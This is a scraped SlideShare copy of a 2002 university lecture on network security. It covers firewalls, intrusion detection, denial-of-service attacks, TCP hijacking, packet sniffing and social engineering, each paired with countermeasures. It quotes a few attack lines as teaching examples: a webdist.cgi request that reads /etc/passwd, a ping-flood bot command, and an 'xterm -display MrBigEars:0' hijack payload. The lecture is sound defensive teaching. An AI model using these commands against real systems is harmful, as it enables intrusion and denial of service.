SlideShare a Scribd company logo
1 of 52
Network Security

         Justin Weisz
         jweisz@andrew.cmu.edu




15-441 Networks Fall 2002        1
A Brief History of the World




15-441 Networks Fall 2002      2
Overview
   What is security?
   Why do we need security?
   Who is vulnerable?
   Common security attacks and countermeasures
    –   Firewalls & Intrusion Detection Systems
    –   Denial of Service Attacks
    –   TCP Attacks
    –   Packet Sniffing
    –   Social Problems

15-441 Networks Fall 2002                         3
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
         • 1. A group or department of private guards: Call building security
           if a visitor acts suspicious.
         • 2. Measures adopted by a government to prevent espionage,
           sabotage, or attack.
         • 3. Measures adopted, as by a business or homeowner, to
           prevent a crime such as burglary or assault: Security was lax at
           the firm's smaller plant.
    …etc.

15-441 Networks Fall 2002                                                   4
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
         • 1. A group or department of private guards: Call building security
           if a visitor acts suspicious.
         • 2. Measures adopted by a government to prevent espionage,
           sabotage, or attack.
         • 3. Measures adopted, as by a business or homeowner, to
           prevent a crime such as burglary or assault: Security was lax at
           the firm's smaller plant.
    …etc.

15-441 Networks Fall 2002                                                   5
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
         • 1. A group or department of private guards: Call building security
           if a visitor acts suspicious.
         • 2. Measures adopted by a government to prevent espionage,
           sabotage, or attack.
         • 3. Measures adopted, as by a business or homeowner, to
           prevent a crime such as burglary or assault: Security was lax at
           the firm's smaller plant.
    …etc.

15-441 Networks Fall 2002                                                   6
What is “Security”
   Dictionary.com says:
    – 1. Freedom from risk or danger; safety.
    – 2. Freedom from doubt, anxiety, or fear; confidence.
    – 3. Something that gives or assures safety, as:
         • 1. A group or department of private guards: Call building security
           if a visitor acts suspicious.
         • 2. Measures adopted by a government to prevent espionage,
           sabotage, or attack.
         • 3. Measures adopted, as by a business or homeowner, to
           prevent a crime such as burglary or assault: Security was lax at
           the firm's smaller plant.
    …etc.

15-441 Networks Fall 2002                                                   7
Why do we need security?
   Protect vital information while still allowing
    access to those who need it
    – Trade secrets, medical records, etc.
   Provide authentication and access control for
    resources
    – Ex: AFS
   Guarantee availability of resources
    – Ex: 5 9’s (99.999% reliability)

15-441 Networks Fall 2002                            8
Who is vulnerable?
 Financial institutions and banks
 Internet service providers
 Pharmaceutical companies
 Government and defense agencies
 Contractors to various government agencies
 Multinational corporations
 ANYONE ON THE NETWORK

15-441 Networks Fall 2002                      9
Common security attacks and
their countermeasures
   Finding a way into the network
    – Firewalls
   Exploiting software bugs, buffer overflows
    – Intrusion Detection Systems
   Denial of Service
    – Ingress filtering, IDS
   TCP hijacking
    – IPSec
   Packet sniffing
    – Encryption (SSH, SSL, HTTPS)
   Social problems
    – Education

15-441 Networks Fall 2002                        10
Firewalls
   Basic problem – many network applications
    and protocols have security problems that
    are fixed over time
    – Difficult for users to keep up with changes and
      keep host secure
    – Solution
         • Administrators limit access to end hosts by using a
           firewall
         • Firewall is kept up-to-date by administrators

15-441 Networks Fall 2002                                        11
Firewalls
   A firewall is like a castle with a drawbridge
    – Only one point of access into the network
    – This can be good or bad
   Can be hardware or software
    – Ex. Some routers come with firewall functionality
    – ipfw, ipchains, pf on Unix systems, Windows XP
      and Mac OS X have built in firewalls


15-441 Networks Fall 2002                             12
Firewalls

        Internet                            DMZ
                                       Web server, email
                                       server, web proxy,
                                       etc
                            Firewall




                                                            Firewall
                                                                       Intranet

15-441 Networks Fall 2002                                                         13
Firewalls
   Used to filter packets based on a combination of
    features
    – These are called packet filtering firewalls
         • There are other types too, but they will not be discussed
    – Ex. Drop packets with destination port of 23 (Telnet)
    – Can use any combination of IP/UDP/TCP header
      information
    – man ipfw on unix47 for much more detail
   But why don’t we just turn Telnet off?

15-441 Networks Fall 2002                                              14
Firewalls
   Here is what a computer with a default
    Windows XP install looks like:
    –   135/tcp open loc-srv
    –   139/tcp open netbios-ssn
    –   445/tcp open microsoft-ds
    –   1025/tcp open NFS-or-IIS
    –   3389/tcp open ms-term-serv
    –   5000/tcp open UPnP
   Might need some of these services, or might
    not be able to control all the machines on the
    network
15-441 Networks Fall 2002                        15
Firewalls
   What does a firewall rule look like?
    – Depends on the firewall used
   Example: ipfw
    – /sbin/ipfw add deny tcp from cracker.evil.org to
      wolf.tambov.su telnet

   Other examples: WinXP & Mac OS X have
    built in and third party firewalls
    – Different graphical user interfaces
    – Varying amounts of complexity and power
15-441 Networks Fall 2002                                16
Intrusion Detection
   Used to monitor for “suspicious activity” on a
    network
    – Can protect against known software exploits, like
      buffer overflows
   Open Source IDS: Snort, www.snort.org




15-441 Networks Fall 2002                             17
Intrusion Detection
   Uses “intrusion signatures”
    – Well known patterns of behavior
         • Ping sweeps, port scanning, web server indexing, OS
           fingerprinting, DoS attempts, etc.
   Example
    – IRIX vulnerability in webdist.cgi
    – Can make a rule to drop packets containing the line
         • “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”

   However, IDS is only useful if contingency plans
    are in place to curb attacks as they are occurring

15-441 Networks Fall 2002                                        18
Minor Detour…
 Say we got the /etc/passwd file from the IRIX
  server
 What can we do with it?




15-441 Networks Fall 2002                     19
Dictionary Attack
   We can run a dictionary attack on the passwords
    – The passwords in /etc/passwd are encrypted with the
      crypt(3) function (one-way hash)
    – Can take a dictionary of words, crypt() them all, and
      compare with the hashed passwords
   This is why your passwords should be meaningless
    random junk!
    – For example, “sdfo839f” is a good password
         • That is not my andrew password
         • Please don’t try it either

15-441 Networks Fall 2002                                     20
Denial of Service
 Purpose: Make a network service unusable,
  usually by overloading the server or network
 Many different kinds of DoS attacks
    – SYN flooding
    – SMURF
    – Distributed attacks
    – Mini Case Study: Code-Red


15-441 Networks Fall 2002                    21
Denial of Service
   SYN flooding attack
   Send SYN packets with bogus source address
    – Why?
   Server responds with SYN ACK and keeps state
    about TCP half-open connection
    – Eventually, server memory is exhausted with this state
   Solution: use “SYN cookies”
    – In response to a SYN, create a special “cookie” for the
      connection, and forget everything else
    – Then, can recreate the forgotten information when the
      ACK comes in from a legitimate connection
15-441 Networks Fall 2002                                       22
Denial of Service




15-441 Networks Fall 2002   23
Denial of Service
   SMURF
    – Source IP address of a broadcast ping is forged
    – Large number of machines respond back to
      victim, overloading it




15-441 Networks Fall 2002                               24
Denial of Service
                              I C M P e c h o ( s p o o f e d s o u r c e a d d r e s s o f v ic t im )
                                         S e n t to IP b ro a d c a s t a d d re s s
                              IC M P e c h o r e p ly




                                                        In te rn e t



                    P e rp e tra to r                                                     V ic tim




15-441 Networks Fall 2002                                                                                 25
Denial of Service
   Distributed Denial of Service
    – Same techniques as regular DoS, but on a much larger
      scale
    – Example: Sub7Server Trojan and IRC bots
         • Infect a large number of machines with a “zombie” program
         • Zombie program logs into an IRC channel and awaits commands
         • Example:
              – Bot command: !p4 207.71.92.193
              – Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
              – Sends 10,000 64k packets to the host (655MB!)
         • Read more at: http://grc.com/dos/grcdos.htm

15-441 Networks Fall 2002                                               26
Denial of Service
   Mini Case Study – CodeRed
    – July 19, 2001: over 359,000 computers infected
      with Code-Red in less than 14 hours
    – Used a recently known buffer exploit in Microsoft
      IIS
    – Damages estimated in excess of $2.6 billion




15-441 Networks Fall 2002                             27
Denial of Service
   Why is this under the Denial of Service
    category?
    – CodeRed launched a DDOS attack against
      www1.whitehouse.gov from the 20th to the 28th
      of every month!
    – Spent the rest of its time infecting other hosts




15-441 Networks Fall 2002                                28
Denial of Service
   How can we protect ourselves?
    – Ingress filtering
         • If the source IP of a packet comes in on an interface
           which does not have a route to that packet, then drop
           it
         • RFC 2267 has more information about this
    – Stay on top of CERT advisories and the latest
      security patches
         • A fix for the IIS buffer overflow was released sixteen
           days before CodeRed had been deployed!
15-441 Networks Fall 2002                                           29
TCP Attacks
   Recall how IP works…
    – End hosts create IP packets and routers process
      them purely based on destination address alone
   Problem: End hosts may lie about other
    fields which do not affect delivery
    – Source address – host may trick destination into
      believing that the packet is from a trusted source
         • Especially applications which use IP addresses as a
           simple authentication method
         • Solution – use better authentication methods

15-441 Networks Fall 2002                                        30
TCP Attacks
   TCP connections have associated state
    – Starting sequence numbers, port numbers
   Problem – what if an attacker learns these
    values?
    – Port numbers are sometimes well known to begin
      with (ex. HTTP uses port 80)
    – Sequence numbers are sometimes chosen in
      very predictable ways

15-441 Networks Fall 2002                         31
TCP Attacks
 If an attacker learns the associated TCP
  state for the connection, then the connection
  can be hijacked!
 Attacker can insert malicious data into the
  TCP stream, and the recipient will believe it
  came from the original source
    – Ex. Instead of downloading and running new
      program, you download a virus and execute it

15-441 Networks Fall 2002                            32
TCP Attacks
   Say hello to Alice, Bob and Mr. Big Ears




15-441 Networks Fall 2002                      33
TCP Attacks
   Alice and Bob have an established TCP
    connection




15-441 Networks Fall 2002                   34
TCP Attacks
   Mr. Big Ears lies on the path between Alice
    and Bob on the network
    – He can intercept all of their packets




15-441 Networks Fall 2002                         35
TCP Attacks
   First, Mr. Big Ears must drop all of Alice’s
    packets since they must not be delivered to
    Bob (why?)


                            Packets

                                         The Void


15-441 Networks Fall 2002                           36
TCP Attacks
   Then, Mr. Big Ears sends his malicious
    packet with the next ISN (sniffed from the
    network)




                                 ISN, SRC=Alice


15-441 Networks Fall 2002                         37
TCP Attacks
   What if Mr. Big Ears is unable to sniff the
    packets between Alice and Bob?
    – Can just DoS Alice instead of dropping her
      packets
    – Can just send guesses of what the ISN is until it
      is accepted
   How do you know when the ISN is accepted?
    – Mitnick: payload is “add self to .rhosts”
    – Or, “xterm -display MrBigEars:0”

15-441 Networks Fall 2002                                 38
TCP Attacks
   Why are these types of TCP attacks so
    dangerous?




        Web server                           Trusting web client


15-441 Networks Fall 2002   Malicious user                     39
TCP Attacks
 How do we prevent this?
 IPSec
    – Provides source authentication, so Mr. Big Ears
      cannot pretend to be Alice
    – Encrypts data before transport, so Mr. Big Ears
      cannot talk to Bob without knowing what the
      session key is



15-441 Networks Fall 2002                               40
Five Minute Break
   For your enjoyment, here is something
    completely unrelated to this lecture:




15-441 Networks Fall 2002                   41
Packet Sniffing
 Recall how Ethernet works …
 When someone wants to send a packet to
  some else …
 They put the bits on the wire with the
  destination MAC address …
 And remember that other hosts are listening
  on the wire to detect for collisions …
 It couldn’t get any easier to figure out what
  data is being transmitted over the network!
15-441 Networks Fall 2002                         42
Packet Sniffing
 This works for wireless too!
 In fact, it works for any broadcast-based
  medium




15-441 Networks Fall 2002                     43
Packet Sniffing
 What kinds of data can we get?
 Asked another way, what kind of information
  would be most useful to a malicious user?
 Answer: Anything in plain text
    – Passwords are the most popular




15-441 Networks Fall 2002                   44
Packet Sniffing
   How can we protect ourselves?
   SSH, not Telnet
    – Many people at CMU still use Telnet and send their password in the
      clear (use PuTTY instead!)
    – Now that I have told you this, please do not exploit this information
    – Packet sniffing is, by the way, prohibited by Computing Services
   HTTP over SSL
    – Especially when making purchases with credit cards!
   SFTP, not FTP
    – Unless you really don’t care about the password or data
    – Can also use KerbFTP (download from MyAndrew)
   IPSec
    – Provides network-layer confidentiality
15-441 Networks Fall 2002                                                 45
Social Problems
   People can be just as dangerous as
    unprotected computer systems
    – People can be lied to, manipulated, bribed,
      threatened, harmed, tortured, etc. to give up
      valuable information
    – Most humans will breakdown once they are at
      the “harmed” stage, unless they have been
      specially trained
         • Think government here…

15-441 Networks Fall 2002                             46
Social Problems
   Fun Example 1:
    – “Hi, I’m your AT&T rep, I’m stuck on a pole. I
      need you to punch a bunch of buttons for me”




15-441 Networks Fall 2002                              47
Social Problems
   Fun Example 2:
    – Someone calls you in the middle of the night
         • “Have you been calling Egypt for the last six hours?”
         • “No”
         • “Well, we have a call that’s actually active right now,
           it’s on your calling card and it’s to Egypt and as a
           matter of fact, you’ve got about $2000 worth of
           charges on your card and … read off your AT&T card
           number and PIN and then I’ll get rid of the charge for
           you”

15-441 Networks Fall 2002                                        48
Social Problems
   Fun Example 3:
    – Who saw Office Space?
    – In the movie, the three disgruntled employees
      installed a money-stealing worm onto the
      companies systems
    – They did this from inside the company, where
      they had full access to the companies systems
         • What security techniques can we use to prevent this
           type of access?

15-441 Networks Fall 2002                                        49
Social Problems
   There aren’t always solutions to all of these problems
    – Humans will continue to be tricked into giving out information they
      shouldn’t
    – Educating them may help a little here, but, depending on how bad
      you want the information, there are a lot of bad things you can do to
      get it
   So, the best that can be done is to implement a wide variety
    of solutions and more closely monitor who has access to
    what network resources and information
    – But, this solution is still not perfect




15-441 Networks Fall 2002                                                 50
Conclusions
 The Internet works only because we implicitly
  trust one another
 It is very easy to exploit this trust
 The same holds true for software
 It is important to stay on top of the latest
  CERT security advisories to know how to
  patch any security holes

15-441 Networks Fall 2002                    51
Security related URLs
 http://www.robertgraham.com/pubs/network-intr
 http://online.securityfocus.com/infocus/1527
 http://www.snort.org/
 http://www.cert.org/
 http://www.nmap.org/
 http://grc.com/dos/grcdos.htm
 http://lcamtuf.coredump.cx/newtcp/


15-441 Networks Fall 2002                  52

More Related Content

What's hot

Ce hv6 module 46 securing laptop computers
Ce hv6 module 46 securing laptop computersCe hv6 module 46 securing laptop computers
Ce hv6 module 46 securing laptop computersVi Tính Hoàng Nam
 
Ce hv6 module 45 privacy on the internet
Ce hv6 module 45 privacy on the internetCe hv6 module 45 privacy on the internet
Ce hv6 module 45 privacy on the internetVi Tính Hoàng Nam
 
CCNA Security 02- fundamentals of network security
CCNA Security 02-  fundamentals of network securityCCNA Security 02-  fundamentals of network security
CCNA Security 02- fundamentals of network securityAhmed Habib
 
Introduction of computer security
Introduction of computer securityIntroduction of computer security
Introduction of computer securitySoundaryaB2
 
Ce hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devicesCe hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devicesVi Tính Hoàng Nam
 
Ceh v5 module 08 denial of service
Ceh v5 module 08 denial of serviceCeh v5 module 08 denial of service
Ceh v5 module 08 denial of serviceVi Tính Hoàng Nam
 
Ce hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomCe hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomVi Tính Hoàng Nam
 
Work from home under the lockdown
Work from home under the lockdownWork from home under the lockdown
Work from home under the lockdownNaseem Khoodoruth
 
Ceh v5 module 17 physical security
Ceh v5 module 17 physical securityCeh v5 module 17 physical security
Ceh v5 module 17 physical securityVi Tính Hoàng Nam
 
Making your Asterisk System Secure
Making your Asterisk System SecureMaking your Asterisk System Secure
Making your Asterisk System SecureDigium
 
CCNA Security 03- network foundation protection
CCNA Security 03- network foundation protectionCCNA Security 03- network foundation protection
CCNA Security 03- network foundation protectionAhmed Habib
 
CCNA Security - Chapter 1
CCNA Security - Chapter 1CCNA Security - Chapter 1
CCNA Security - Chapter 1Irsandi Hasan
 
Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...
Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...
Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...Claudy75
 
IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)
IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)
IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)sequi_inc
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesMaxime ALAY-EDDINE
 
Brownstone Security: Guards and Video Surveillance
Brownstone Security: Guards and Video SurveillanceBrownstone Security: Guards and Video Surveillance
Brownstone Security: Guards and Video SurveillanceBrownstone Security
 
Ce hv6 module 49 creating security policies
Ce hv6 module 49 creating security policiesCe hv6 module 49 creating security policies
Ce hv6 module 49 creating security policiesVi Tính Hoàng Nam
 
Network Security
Network SecurityNetwork Security
Network SecurityMAJU
 

What's hot (20)

Ce hv6 module 62 case studies
Ce hv6 module 62 case studiesCe hv6 module 62 case studies
Ce hv6 module 62 case studies
 
Ce hv6 module 46 securing laptop computers
Ce hv6 module 46 securing laptop computersCe hv6 module 46 securing laptop computers
Ce hv6 module 46 securing laptop computers
 
Ce hv6 module 45 privacy on the internet
Ce hv6 module 45 privacy on the internetCe hv6 module 45 privacy on the internet
Ce hv6 module 45 privacy on the internet
 
CCNA Security 02- fundamentals of network security
CCNA Security 02-  fundamentals of network securityCCNA Security 02-  fundamentals of network security
CCNA Security 02- fundamentals of network security
 
Introduction of computer security
Introduction of computer securityIntroduction of computer security
Introduction of computer security
 
Ce hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devicesCe hv6 module 41 hacking usb devices
Ce hv6 module 41 hacking usb devices
 
Ceh v5 module 08 denial of service
Ceh v5 module 08 denial of serviceCeh v5 module 08 denial of service
Ceh v5 module 08 denial of service
 
BYOD and Your Business
BYOD and Your BusinessBYOD and Your Business
BYOD and Your Business
 
Ce hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomCe hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atom
 
Work from home under the lockdown
Work from home under the lockdownWork from home under the lockdown
Work from home under the lockdown
 
Ceh v5 module 17 physical security
Ceh v5 module 17 physical securityCeh v5 module 17 physical security
Ceh v5 module 17 physical security
 
Making your Asterisk System Secure
Making your Asterisk System SecureMaking your Asterisk System Secure
Making your Asterisk System Secure
 
CCNA Security 03- network foundation protection
CCNA Security 03- network foundation protectionCCNA Security 03- network foundation protection
CCNA Security 03- network foundation protection
 
CCNA Security - Chapter 1
CCNA Security - Chapter 1CCNA Security - Chapter 1
CCNA Security - Chapter 1
 
Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...
Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...
Sécurité: Risques, tendances & préconisations à venir par Eric HOHBAUER, Dire...
 
IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)
IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)
IEEE Standard for Securing Legacy Scada Protocols (Sequi, Inc)
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Brownstone Security: Guards and Video Surveillance
Brownstone Security: Guards and Video SurveillanceBrownstone Security: Guards and Video Surveillance
Brownstone Security: Guards and Video Surveillance
 
Ce hv6 module 49 creating security policies
Ce hv6 module 49 creating security policiesCe hv6 module 49 creating security policies
Ce hv6 module 49 creating security policies
 
Network Security
Network SecurityNetwork Security
Network Security
 

Viewers also liked

Infinity phone
Infinity phoneInfinity phone
Infinity phonealeboi
 
Puzzle maker veronica astudillo 10 1 4,7
Puzzle maker veronica astudillo  10 1 4,7Puzzle maker veronica astudillo  10 1 4,7
Puzzle maker veronica astudillo 10 1 4,7veroastudillo16
 
Tkg master training template
Tkg master training templateTkg master training template
Tkg master training templateErikaFrager
 
Puzzle maker veronica astudillo 10 1 4,7
Puzzle maker veronica astudillo  10 1 4,7Puzzle maker veronica astudillo  10 1 4,7
Puzzle maker veronica astudillo 10 1 4,7veroastudillo16
 
Fumo in Italia report 2016
Fumo in Italia report 2016Fumo in Italia report 2016
Fumo in Italia report 2016Doxa
 
Fumo di Sigaretta a Milano (Maggio 2016)
Fumo di Sigaretta a Milano (Maggio 2016)Fumo di Sigaretta a Milano (Maggio 2016)
Fumo di Sigaretta a Milano (Maggio 2016)Doxa
 
Nuove generazioni e il loro rapporto con il denaro
Nuove generazioni e il loro rapporto con il denaroNuove generazioni e il loro rapporto con il denaro
Nuove generazioni e il loro rapporto con il denaroDoxa
 

Viewers also liked (7)

Infinity phone
Infinity phoneInfinity phone
Infinity phone
 
Puzzle maker veronica astudillo 10 1 4,7
Puzzle maker veronica astudillo  10 1 4,7Puzzle maker veronica astudillo  10 1 4,7
Puzzle maker veronica astudillo 10 1 4,7
 
Tkg master training template
Tkg master training templateTkg master training template
Tkg master training template
 
Puzzle maker veronica astudillo 10 1 4,7
Puzzle maker veronica astudillo  10 1 4,7Puzzle maker veronica astudillo  10 1 4,7
Puzzle maker veronica astudillo 10 1 4,7
 
Fumo in Italia report 2016
Fumo in Italia report 2016Fumo in Italia report 2016
Fumo in Italia report 2016
 
Fumo di Sigaretta a Milano (Maggio 2016)
Fumo di Sigaretta a Milano (Maggio 2016)Fumo di Sigaretta a Milano (Maggio 2016)
Fumo di Sigaretta a Milano (Maggio 2016)
 
Nuove generazioni e il loro rapporto con il denaro
Nuove generazioni e il loro rapporto con il denaroNuove generazioni e il loro rapporto con il denaro
Nuove generazioni e il loro rapporto con il denaro
 

Similar to Lec21 security

Similar to Lec21 security (20)

Lesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptxLesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptx
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
network.ppt
network.pptnetwork.ppt
network.ppt
 
my lecture 21.network security.2023.ppt
my lecture 21.network security.2023.pptmy lecture 21.network security.2023.ppt
my lecture 21.network security.2023.ppt
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
Network Security
Network SecurityNetwork Security
Network Security
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
INTERNET SECURITY.ppt
INTERNET SECURITY.pptINTERNET SECURITY.ppt
INTERNET SECURITY.ppt
 
lec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.pptlec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.ppt
 
EC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR KEC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR K
 
Network security
Network securityNetwork security
Network security
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
 
Network Security
Network SecurityNetwork Security
Network Security
 
Network Security
Network  SecurityNetwork  Security
Network Security
 
Chapter 6 network security
Chapter 6   network securityChapter 6   network security
Chapter 6 network security
 
Network seurity
Network seurityNetwork seurity
Network seurity
 
lec security
lec securitylec security
lec security
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???
 
Network security
Network securityNetwork security
Network security
 
Network security
Network securityNetwork security
Network security
 

Recently uploaded

"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Recently uploaded (20)

"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
How to convert PDF to text with Nanonets
